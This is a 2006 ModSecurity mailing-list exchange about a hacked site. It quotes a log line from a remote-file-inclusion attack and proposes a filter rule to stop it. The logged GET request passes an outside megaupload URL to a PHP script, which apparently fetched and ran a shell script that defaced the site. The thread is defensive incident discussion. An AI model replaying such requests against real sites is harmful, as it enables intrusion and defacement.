[Modsecurity] New downloadable exploit
Mike Cardwell
modsecurity at blubbernet.com
Thu Apr 20 07:43:00 EDT 2006
* on the Thu, Apr 20, 2006 at 12:00:52AM -0400, Michael S. wrote:
> One of our user sites was hacked on April 4th. It seems they used this
> command to do it.
>
> 195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET
> /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&
> comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpubli
> c_html%2Fimages%2Fdvd HTTP/1.1" 200 12933
> "http://www.site.com.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0;
> Windows NT 5.1; SV1)" "hotlog=1"
>
> Notice the 200 status? Is there a rule to stop this?
The question to ask is, what is bad about the format of the request? Eg,
should the value of the "link" arg be allowed to be a url? If not, then
you can filter on something like the following:
SecFilterSelective ARG_link "^(ht|f)tps?://"
Note, using that rule might break the functionality of the script. But
being as I don't know what package it is, or if it was a custom written
script etc, I can't tell what are safe inputs in order to write a valid
filter.
> This is a shell script that was downloaded to the user's website then
> execute to deface the site. They were unable to do anything.
They could modify the code to not execute arbitrary remote files ...
Mike
--
Digital photo printing: http://www.fotoserve.com/
More information about the Modsecurity
mailing list